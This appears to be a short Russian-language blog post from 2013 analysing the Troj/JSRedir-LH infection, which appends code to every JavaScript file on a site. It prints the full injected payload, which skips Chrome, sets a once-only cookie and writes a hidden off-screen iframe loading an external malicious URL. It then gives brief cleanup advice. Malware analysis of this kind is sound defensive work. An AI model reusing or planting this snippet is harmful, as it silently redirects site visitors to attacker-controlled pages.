Access Point

0
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Troj/JSRedir-LH

admin 05.05.2013

Вредоносный код добавляется во все *.js файлы

Добавляемый вирусом код (Для раскрытия нажать на плюсик)

(function(){

function stripos (f_haystack, f_needle, f_offset) {

 var haystack = (f_haystack + '').toLowerCase();

 var needle = (f_needle + '').toLowerCase();

 var index = 0;

 if ((index = haystack.indexOf(needle, f_offset)) !== -1) {

 return index;

 }

 return false;

}

function papirosa(){

 var denyList = ['Chrome'];

 var denyUA = false;

 for (var i in denyList) {

 if (stripos(navigator.userAgent, denyList[i])) {

 denyUA = true;

 break;

 }

 }

 return denyUA;

}

function setCookie(name, value, expires) {

 var date = new Date( new Date().getTime() + expires*1000 );

 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();

}

function getCookie(name) {

 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));

 return matches ? decodeURIComponent(matches[1]) : undefined;

}

if (!papirosa()) {

 var cookie = getCookie('b19ad018sc');

 if (cookie == undefined) {

 setCookie('b19ad018sc', true, 292200); 

 document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://dinamicname.ru/iy7yhd.dgaPnykU?default"></iframe>');

 }

};

})();

 

Сначала удаляете вирус, потом обновляете плагины и CMS до последней стабильной версии.

В связи с отсутствием доступа к логам зараженных сайтов, более подробно о способе заражения\лечения, мне узнать не представляется возможным.

Буду дополнять по мере возможности.

 

Leave a Comment

Login to your account

Can't remember your Password ?

Register for this site!